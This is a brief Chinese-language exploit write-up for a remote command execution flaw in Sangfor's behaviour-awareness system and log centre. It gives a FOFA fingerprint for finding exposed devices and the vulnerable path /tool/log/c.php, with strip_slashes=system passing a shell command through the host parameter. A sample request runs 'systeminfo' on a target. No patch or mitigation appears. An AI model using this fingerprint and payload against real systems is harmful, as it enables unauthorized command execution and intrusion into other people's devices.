深信服行为感知系统&&日志中心 远程命令执行漏洞

漏洞描述

深信服行为感知系统&&日志中心 远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行

漏洞影响

深信服 行为感知系统和日志中心

FOFA

body="isHighPerformance : !!SFIsHighPerformance,"

漏洞复现

漏洞URL为：

/tool/log/c.php?strip_slashes=system&host=

例如我要查看目标机器的系统信息：

https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=systeminfo